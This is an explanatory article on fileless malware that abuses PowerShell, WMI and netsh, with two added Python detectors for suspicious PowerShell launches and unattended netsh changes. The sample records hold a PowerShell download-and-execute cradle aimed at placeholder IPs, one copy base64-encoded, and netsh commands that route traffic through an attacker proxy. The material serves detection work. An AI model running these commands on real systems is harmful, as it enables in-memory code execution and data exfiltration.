Like many other malware attacks, a fileless attack can begin with nothing more than an unsuspecting end user clicking a link. The difference is how hard the resulting infection is to spot.
You may have heard of ‘fileless malware’ under a different name, such as a “zero-footprint” or “non-malware” attack. Don’t be fooled: both nicknames are close to misnomers. A fileless attack often still relies on the user opening a malicious attachment or link, and it does leave traces on the computer (in memory, in logs, and in the system’s own scripting and management facilities), only small ones that are extremely easy to overlook.
Fileless Malware: How it works
Before we delve into just how big a threat fileless malware is, here’s a quick step-by-step example of how cyber criminals use the technique:
Step 1: A user receives a typical spam email containing a link to a malicious website
Step 2: The unsuspecting user clicks the link
Step 3: They’re directed to the malicious website, which loads Flash content in their browser
Step 4: An exploit for a vulnerability in Flash (a plugin well known for having them) launches Windows PowerShell, which can execute instructions from the command line while operating entirely in memory
Step 5: PowerShell downloads a script from a command-and-control server and executes it without ever writing it to disk
Step 6: The PowerShell script locates the user’s data and sends it to the attacker
This technique leverages an operating system’s built-in tools and capabilities to execute the malicious activity. The Flash step is dated now that Adobe has ended support for Flash Player, but any exploit or document that can start a script host fills the same role. The most common instances of fileless attacks are the abuse of Microsoft’s WMI and PowerShell.
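Steps 4 and 5 above, together with the WMI and PowerShell abuse just mentioned, leave one reliable artefact even when nothing touches disk: the process-creation event for the PowerShell launch. The following is an added example (not code from the original article) that scores such events for the three things a defender looks for: the flags that make PowerShell run quietly, a download cradle that feeds fetched script text straight into Invoke-Expression, and a parent process that shows a browser, a script host or WMI started the shell. It also decodes `-EncodedCommand`, since that flag hides the cradle from naive string matching. The field names, the sample records and the parent-process list are this example’s own assumptions, not a fixed log schema.

```python
"""Score PowerShell launches for the in-memory download-and-execute stage.

Added example, not code from the original article. It scans constructed
process-creation records (the fields Windows Security event 4688 or
Sysmon event 1 would supply, reduced to the ones used here). Field names
and the sample records are this example's own assumptions.
"""
import base64
import re

# (regex, label, weight). Case-insensitive; the short forms are the
# parameter aliases PowerShell itself accepts.
INDICATORS = [
    (r"-(?:nop|noprofile)\b", "NoProfile", 1),
    (r"-(?:w|win|windowstyle)\s+hidden\b", "WindowStyle Hidden", 2),
    (r"-(?:noni|noninteractive)\b", "NonInteractive", 1),
    (r"-(?:ep|exec|executionpolicy)\s+bypass\b", "ExecutionPolicy Bypass", 2),
    (r"net\.webclient", "Net.WebClient", 2),
    (r"download(?:string|data|file)", "WebClient download", 2),
    (r"invoke-(?:webrequest|restmethod)|\b(?:iwr|irm)\b", "Invoke-WebRequest", 2),
    (r"\biex\b|invoke-expression", "Invoke-Expression", 3),
    (r"frombase64string", "FromBase64String", 2),
]

# Parents that should not normally be launching PowerShell: browsers (the
# Flash plugin ran inside them), the Windows script hosts, and WmiPrvSE.exe,
# the WMI provider host that is the parent of WMI-launched processes.
SUSPICIOUS_PARENTS = {
    "iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
    "wmiprvse.exe",
}

# -e, -ec, -enc and -EncodedCommand followed by a base64 blob.
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext behind -EncodedCommand, or None if there is none.

    The argument is base64 of the script's UTF-16LE bytes, which is why a
    plain base64 decode shows a NUL between every character.
    """
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(record):
    """Score one process-creation record; non-PowerShell images score 0."""
    if not record["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return {"score": 0, "indicators": [], "decoded": None}
    cmdline = record["cmdline"]
    decoded = decode_encoded_command(cmdline)
    indicators, score = [], 0
    if decoded is not None:
        indicators.append("EncodedCommand")
        score += 2
    # Search the visible command line and the decoded payload together, so an
    # encoded cradle scores the same as a plaintext one.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, text, re.IGNORECASE):
            indicators.append(label)
            score += weight
    parent = record["parent"].lower()
    if parent in SUSPICIOUS_PARENTS:
        indicators.append("spawned by " + parent)
        score += 3
    return {"score": score, "indicators": indicators, "decoded": decoded}


def scan(records, threshold=6):
    """Return (record, analysis) pairs for records scoring at or above threshold."""
    hits = []
    for rec in records:
        result = analyze(rec)
        if result["score"] >= threshold:
            hits.append((rec, result))
    return hits


# Constructed sample records, not real telemetry. The encoded payload is built
# here so the example is self-contained; addresses are RFC 5737 documentation ranges.
STAGE2_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s2.ps1')"
ENCODED_STAGE2 = base64.b64encode(STAGE2_PLAINTEXT.encode("utf-16-le")).decode("ascii")
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_RECORDS = [
    # An admin's scheduled inventory script: quiet, but nothing else.
    {"id": 1, "parent": "explorer.exe", "image": PS_EXE,
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    # Steps 4-5 above: the browser hosting Flash starts a hidden shell that pulls stage 2 into memory.
    {"id": 2, "parent": "iexplore.exe", "image": PS_EXE,
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/stage2.ps1')\""},
    # The same cradle launched through WMI and wrapped in -EncodedCommand.
    {"id": 3, "parent": "WmiPrvSE.exe", "image": PS_EXE,
     "cmdline": "powershell.exe -NonI -W Hidden -Enc " + ENCODED_STAGE2},
    {"id": 4, "parent": "explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for rec, result in scan(SAMPLE_RECORDS):
        print(f"record {rec['id']} score {result['score']}: {', '.join(result['indicators'])}")
```

Run stand-alone, the scanner reports records 2 and 3 and ignores the administrator’s inventory script, which only trips the NoProfile indicator. The weights and threshold are illustrative; in a real deployment the parent-process signal and the decoded payload matter far more than any single flag, and the same records should be correlated with PowerShell script block logging (event 4104), which captures the script text even when it never exists as a file.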
Why is it so difficult to detect?
With no payload file written to disk, antivirus software has nothing to hash or match against a signature built from a malware file’s characteristics. This poses a problem, as the scanner simply does not know what to look for.
Adding to the detection difficulty is the fact that fileless malware uses the system’s own commands to carry out the attack. For instance, using the netsh command to configure a network interface, assign it a static IP address and point the system at a specific proxy is a perfectly normal, built-in function of Windows, and an administrator does it every day.
But if a script performs those same steps without the user’s knowledge, the reconfigured connection can be used to exfiltrate data from that system to a remote host across the internet, with the traffic routed through the attacker’s proxy so that it blends in rather than standing out.
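Because the netsh commands are legitimate, the useful signal is not the command itself but who ran it. The following is an added example (not code from the original article) that takes constructed process-creation records, walks the parent chain of every netsh process, and flags the address and proxy changes the text describes only when a script host sits somewhere above netsh instead of an interactive shell. It goes one step beyond the text by also covering port-proxy and firewall-rule additions, which are abused the same way. The field names, the script-host list and the sample process tree are this example’s own assumptions.

```python
"""Flag netsh network changes made with no user at the keyboard.

Added example, not code from the original article. Records carry pid,
parent pid, image and command line (the shape Sysmon event 1 or Security
event 4688 provides). Field names, the host list and the sample tree are
this example's own assumptions.
"""
import re

# netsh operations worth reviewing when run unattended. The first two are the
# steps the text describes; the port proxy and firewall rule go one step beyond it.
NETSH_PATTERNS = [
    (r"\binterface\s+ip(?:v4)?\s+set\s+address\b.*\bstatic\b", "static IP assigned"),
    (r"\bwinhttp\s+set\s+proxy\b", "WinHTTP proxy configured"),
    (r"\binterface\s+portproxy\s+add\b", "port proxy added"),
    (r"\badvfirewall\s+firewall\s+add\s+rule\b", "firewall rule added"),
]

# An ancestor from this set means a script, not a person, issued the command.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "wmiprvse.exe"}


def ancestry(pid, by_pid):
    """Image names from the process itself up to the root we have records for."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:  # seen guards against pid reuse loops
        seen.add(pid)
        rec = by_pid[pid]
        chain.append(rec["image"].lower())
        pid = rec["ppid"]
    return chain


def classify_netsh(records):
    """Describe every netsh invocation that matches a reviewed operation."""
    by_pid = {r["pid"]: r for r in records}
    findings = []
    for rec in records:
        if rec["image"].lower() != "netsh.exe":
            continue
        for pattern, action in NETSH_PATTERNS:
            if re.search(pattern, rec["cmdline"], re.IGNORECASE):
                chain = ancestry(rec["pid"], by_pid)
                findings.append({
                    "pid": rec["pid"],
                    "action": action,
                    "chain": " <- ".join(chain),
                    # chain[0] is netsh itself; look only at its ancestors.
                    "unattended": any(img in SCRIPT_HOSTS for img in chain[1:]),
                })
                break
    return findings


def find_unattended_netsh(records):
    """Only the findings where a script host sits somewhere above netsh."""
    return [f for f in classify_netsh(records) if f["unattended"]]


# Constructed sample process tree, not real telemetry (RFC 5737 addresses).
SAMPLE_PROCESSES = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    # An administrator at a console sets the corporate proxy: same command, benign lineage.
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 201, "ppid": 200, "image": "netsh.exe",
     "cmdline": 'netsh winhttp set proxy proxy-server="proxy.corp.example:8080"'},
    {"pid": 202, "ppid": 200, "image": "netsh.exe", "cmdline": "netsh interface show interface"},
    # The chain from the article: browser -> hidden PowerShell -> netsh reconfigures
    # the interface and points the system at the attacker's proxy.
    {"pid": 300, "ppid": 100, "image": "iexplore.exe", "cmdline": "iexplore.exe"},
    {"pid": 310, "ppid": 300, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -nop"},
    {"pid": 311, "ppid": 310, "image": "netsh.exe",
     "cmdline": 'netsh interface ip set address name="Ethernet" static 192.0.2.50 255.255.255.0 192.0.2.1'},
    {"pid": 312, "ppid": 310, "image": "netsh.exe",
     "cmdline": 'netsh winhttp set proxy proxy-server="203.0.113.5:8080" bypass-list="<local>"'},
]

if __name__ == "__main__":
    for f in find_unattended_netsh(SAMPLE_PROCESSES):
        print(f"pid {f['pid']}: {f['action']} via {f['chain']}")
```

The administrator’s proxy change (pid 201) and the read-only `netsh interface show interface` are left alone; the two netsh processes under the browser-spawned PowerShell are reported with their full lineage, which is exactly the context an analyst needs to decide whether the “normal” command was normal. Lineage is only as good as the telemetry: if process-creation auditing with command lines is not enabled, there is nothing to walk.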